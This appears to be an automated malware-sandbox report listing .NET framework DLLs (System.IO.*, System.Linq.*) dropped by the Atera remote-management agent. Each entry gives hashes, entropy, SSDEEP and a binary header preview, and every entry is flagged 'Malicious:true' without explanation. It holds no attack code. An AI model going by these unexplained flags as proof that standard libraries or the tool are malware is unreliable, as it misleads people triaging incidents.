                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.901982040259458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rZ4RLWdRfRJ0RZWuNyb8E9VF6IYinAM+oClyIw:rZK0pJu5EpYinAMxCoV
                                                                                                                                                                                                                                        MD5:5B6944584BF4FB195EC78FB784FE00C9
                                                                                                                                                                                                                                        SHA1:FC424293203C3F548350C2DF926ADA9661C9A58D
                                                                                                                                                                                                                                        SHA-256:4B7C21A0B17ABE309DE7D13E19121AFBD500DA18E3CE24B458BAC75B76964617
                                                                                                                                                                                                                                        SHA-512:1F823487A61983740FC5BCBEADFFFCB6BD98079BF0CA5B49C0A2AAFB79271360B3D50D0DE61D68C210E0D5FC41B5BD77A5301DD88AD5E781C7EA93733A440185
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................x.....@..................................)..O....@..................0(...`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.796826114342678
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:BFx+WTIEfW50ANyby2sE9jBF6IYiYF8pA5K+oCGUHFz9ZIT8Vo1t:3YWsmW5Nyb8E9VF6IYinAM+oC39m4Ct
                                                                                                                                                                                                                                        MD5:61F8B8156F47D9B9015836E9A54764EF
                                                                                                                                                                                                                                        SHA1:119E781B2E161CFEB429A66FC2B967568CA66737
                                                                                                                                                                                                                                        SHA-256:51E5356D46C5201333603612E2645D6A57001EC39236D63C768B5E166803BA89
                                                                                                                                                                                                                                        SHA-512:1F4A962B86D75EBA7BDE6CAF1633BEEDC9135D842B1AFDE4F3654A330BEF6278774D4F15CF553F65E2C495A65B55851CCD1BDD35611832A4C4D2AD33EAF2FD7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ...............................@....@..................................'..O....@..@...............0(...`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):105008
                                                                                                                                                                                                                                        Entropy (8bit):6.382489232559774
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXW7Hx37:Lgk1tiLMYiDFvxqrWDWNoJXWR7
                                                                                                                                                                                                                                        MD5:92B40FA097AF4C396915B768230B1ABE
                                                                                                                                                                                                                                        SHA1:5CCE8D2763344647A77EB3543C2D9693BA3161DD
                                                                                                                                                                                                                                        SHA-256:21CE4C2841415442B62973B447FEEBB82341EF92FC4A852BC1FD87437B3F85BB
                                                                                                                                                                                                                                        SHA-512:4FA3DDEDA45CCEF80F23527AFCFD52C32E29A2C58083884F09A018D9F8FC5969EF3B2C1681963053816C4A9C476A26A3796D2BAECD68B9C19CFEC76D3C6498A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... ....................................@.................................5W..O....................r..0(...........V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r7..p.(....*2rs..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r=..p.(....*2r_..p.(....*2r...p.(....*2r...p.(....*2r...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.855519530441361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:BKcuz1W1cWMNyb8E9VF6IYinAM+oCLn3b:bu86EpYinAMxCbr
                                                                                                                                                                                                                                        MD5:D3AB242ED33C56AB362F290A4404EC49
                                                                                                                                                                                                                                        SHA1:D0152BFAD70CC88745CCBAFCFCA21EFFDA23FFBF
                                                                                                                                                                                                                                        SHA-256:671804049A40885C30E447ED33031E4471D1FE2DB47F312A2E10182FECA64442
                                                                                                                                                                                                                                        SHA-512:F6582A7013B3022326E02C89A8E2B7DBA320BEFDC611F194850A64D29CDF420A63A5C5785610DC77F26B3A42B6995B85FF9A13917C3F01E2F3E1512234F38294
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................k.....@..................................(..O....@..P...............0(...`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.860759859303493
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:NpXYpxjSSWikW5I0Nyby2sE9jBF6IYiYF8pA5K+oCGUHFUd79eOJZWz3:i+SWikWBNyb8E9VF6IYinAM+oCAd57O
                                                                                                                                                                                                                                        MD5:E9BEB1736F3761618A4A2AC73F81E6F3
                                                                                                                                                                                                                                        SHA1:BC2268CBA28C36257846A9359E6ADBF737483710
                                                                                                                                                                                                                                        SHA-256:A7F932F2728E70F18A0BAC54FA738DEE4E8A52805A3CC10315A1C8A0B0B0F296
                                                                                                                                                                                                                                        SHA-512:DCAD6607C0923A15CD66C74A5867CAF7B8EF3B68AE6D9FF10A05368EEEFDE92395B74942B884F0AB53C3238F32A21AD5068F5E489FAAEA5C95DD12887644407F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................~.....@..................................(..O....@..P...............0(...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.908741291375105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:YDxxhREWzgW5mGNyby2sE9jBF6IYiYF8pA5K+oCGUHF76amadfTUfJ:MAWzgWlNyb8E9VF6IYinAM+oCXffTUfJ
                                                                                                                                                                                                                                        MD5:9F74A58B45EDD0ADB5CDB20541666B50
                                                                                                                                                                                                                                        SHA1:9079C0E87514FA9739DA566F3493790CEDEF1E8E
                                                                                                                                                                                                                                        SHA-256:6FD266CE85C9637BE043278A24A4ED410D02A81B7B6E8C44390E659F0C67CFDC
                                                                                                                                                                                                                                        SHA-512:7F6DD752F8FEEB782C31375787981546384623806A9B56C5953050576F5B81E46DA5E8FC3B796BA6D7866FCE63F7990678ECEEFC7BBCA8F526C4BE67CCF38ABD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................p)..O....@..@...............0(...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8673161701513905
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:0BLRWbYWAjNyb8E9VF6IYinAM+oC7c2zJ:0B26/EpYinAMxCYKJ
                                                                                                                                                                                                                                        MD5:374E3295625421E27300822C6A7C8A2F
                                                                                                                                                                                                                                        SHA1:71A298127AD4469B838BC34A6610FE3E15FEF6D6
                                                                                                                                                                                                                                        SHA-256:59F98B1461F3B4D12C8AD3F71CB8A183F0BC985BC71C6CBABF6D143EE7D9E1D3
                                                                                                                                                                                                                                        SHA-512:9BB2A8B0FC8153E79143FDB11F010CE22895D6F1521DB5F6FDE49FDD10A7F5C502C29D4D70459B2F8E5976360AE3AC8267DB07564EE9D8F8824FA20CD333F882
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ....................................@..................................)..O....@..................0(...`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.852435714145632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:KZxcMRW4/W5x9Nyby2sE9jBF6IYiYF8pA5K+oCGUHFyF5FQEEX:KHW4/WRNyb8E9VF6IYinAM+oC+iEEX
                                                                                                                                                                                                                                        MD5:41858594F019A9363968AD51A111F139
                                                                                                                                                                                                                                        SHA1:4ED3F99C726D44459E555F0320F75EDB01CD84AC
                                                                                                                                                                                                                                        SHA-256:6E257268CFD9327471BDD3C11D9067C1D3BA647CB662BCC40C6F9E45C24CF199
                                                                                                                                                                                                                                        SHA-512:96518CF69E710065C8FDCBCC412F23BD56F1FE84D98A20E0D876A529CA4DC8F749BB51AC2C9E730515FF141459D36590DD55388115DDBA64809EC1EB738A057B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ...............0(...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.912298773762876
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1vk7hWmCW0Nyb8E9VF6IYinAM+oCu4sn2n:1s7/gEpYinAMxCD
                                                                                                                                                                                                                                        MD5:A8698F78D7FDBE9C11E29DE1C8141F0D
                                                                                                                                                                                                                                        SHA1:DDE73E1F36AFCAB694188DF924255DF1DD5A54D3
                                                                                                                                                                                                                                        SHA-256:216C502237CD73674B98D143D63E7F60E963C184F49A429840E79AC78EBE6E8C
                                                                                                                                                                                                                                        SHA-512:0CDF41B1776CD8DBB2A94534B85EC0161996A3F12223497C6CF1E676B863EF66AEBD47B4E857A38F0759F4C6E228258E620FEEF7C2F2B0D7E4AA690D526DE622
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................h)..O....@..0...............0(...`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8752019860189915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:VUiW2xf+C/WCUW52DNyby2sE9jBF6IYiYF8pA5K+oCGUHFLZio+HpyXR:7GMWCUW4Nyb8E9VF6IYinAM+oCR6Ji
                                                                                                                                                                                                                                        MD5:E7943D3776DF788CB4BB5983475C42C1
                                                                                                                                                                                                                                        SHA1:5BB28B2CAD8EFB83E9A3AD6944DF28B39E8FA578
                                                                                                                                                                                                                                        SHA-256:6BEF4F189347DFC49188886DAC2C1BDC67575A4782D9945BAE9D02736D9113BE
                                                                                                                                                                                                                                        SHA-512:8A1D4C7267E3D140344D1629D70C50EF4B873582C76027CC9C37FB560797D50A21133725C968036FC42F44269BDCC6C3C1EFE1D60FE1782997DB7689797E5F75
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................9....@.................................@)..O....@..................0(...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.855920100243135
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:oBhwI7WSQWLNyb8E9VF6IYinAM+oCCtgNqqRq:oDwIBlEpYinAMxCij
                                                                                                                                                                                                                                        MD5:84690B08BFFE03B6BC40150D1437C32E
                                                                                                                                                                                                                                        SHA1:4755146A645F174ED652FABE74FDBAD329732EBF
                                                                                                                                                                                                                                        SHA-256:D3BD5400C629CBA40298704C856AC10F1FE88EB4A45FC0DA6E8CEF43D2E78ED5
                                                                                                                                                                                                                                        SHA-512:9017CCAC45B46FB34CC3BD4DE6D93B373764EADF512152E0D52849212A650AE98B3B16A29DCDE17F6AFD54CB1BC8D2CA0878E80A532FC678295278DC6CCE6BFE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................S_....@.................................l(..O....@..P...............0(...`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.872271620769971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nyvPRW4lWaNyb8E9VF6IYinAM+oCnKGq8O:y39ZEpYinAMxCo8O
                                                                                                                                                                                                                                        MD5:58EF24053EF42A04319D32790B7D2869
                                                                                                                                                                                                                                        SHA1:4C4E8565A9A6245E1174448447259065155986DA
                                                                                                                                                                                                                                        SHA-256:A78C9C9EEC55D713E8C831F489180F2A4D7326F7DCDE0AA73B5D71D2DFC03DFE
                                                                                                                                                                                                                                        SHA-512:92BC0D5AA56C4023FEA0E07CC46FEED4084F95478D28F9D3B63C7A2CFF1ECE4D788ADF6E250E4875EB6139BBE263B0269F6A8BF8E3913E6138BF006DF0C11175
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...................................@..................................)..O....@..................0(...`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.825074648710409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mnhp+J2sx/5W6eW5L2Nyby2sE9jBF6IYiYF8pA5K+oCGUHF9IAvcnV+:Q6RW6eWoNyb8E9VF6IYinAM+oCiAUnM
                                                                                                                                                                                                                                        MD5:42A89FD4C53986FBC8289708FFB1263B
                                                                                                                                                                                                                                        SHA1:AD7FE0D4FE9B5D687F6B0302274BF3D10C41E421
                                                                                                                                                                                                                                        SHA-256:7580CFED004628AED3387E69EC65F803554CC1FEABE713F5E40B0B8452B70CB1
                                                                                                                                                                                                                                        SHA-512:559AC7E5AFA90B9AE0E4E073E1AA4F3BD6E898DAD2D7D147FC1CE0AF5992811A1EDE8A3838D61A337A1400F9F19BA3EE1F24E3ED4671648AC743ABBDDFAAE872
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ...................................@..................................-..O....@..................0(...`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.854807580267664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:2SPuxFp9W70W5pjNyby2sE9jBF6IYiYF8pA5K+oCGUHFqR3Oqfx:2SUP9W70WTNyb8E9VF6IYinAM+oCu1PZ
                                                                                                                                                                                                                                        MD5:7F36B38B6D68B2B84986A2BD204F4670
                                                                                                                                                                                                                                        SHA1:A3769DC8995D4A99C15A5EED0CE28D017B10EA8A
                                                                                                                                                                                                                                        SHA-256:304372309F5C1C12970DE3DB8BB676C9954502F59DA657B15DA1AB9BA6FA96BA
                                                                                                                                                                                                                                        SHA-512:40DE14AFC65204EAD6FE45A61C3EEE4026EF45FB665604DD84C938A86C26146F7F924EB50C9204DA5E26876AB3A47CE3F002A444D98F3F42D1A6E9F7884F1557
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...................................@..................................(..O....@..................0(...`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.854259669078053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:08yg07W0/WFNyb8E9VF6IYinAM+oC/ohW:0BH0EpYinAMxCAI
                                                                                                                                                                                                                                        MD5:23AF67BC85948EB59B156F6E1B169DC4
                                                                                                                                                                                                                                        SHA1:E47CE61981B756E526C46FD65F1296C32F332C9A
                                                                                                                                                                                                                                        SHA-256:480788BDF15639CDF55F20B15A20DFA0E9C02B9A4C0A48496108D1DEDBE79305
                                                                                                                                                                                                                                        SHA-512:240B05E6902D692A03934332327D50F22185026D1F74736B85731BE90297C5F27B802E846FC2E405AACECFDEEDFF61F8147B4E57E6BC07C32EBB8385FE8B286B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
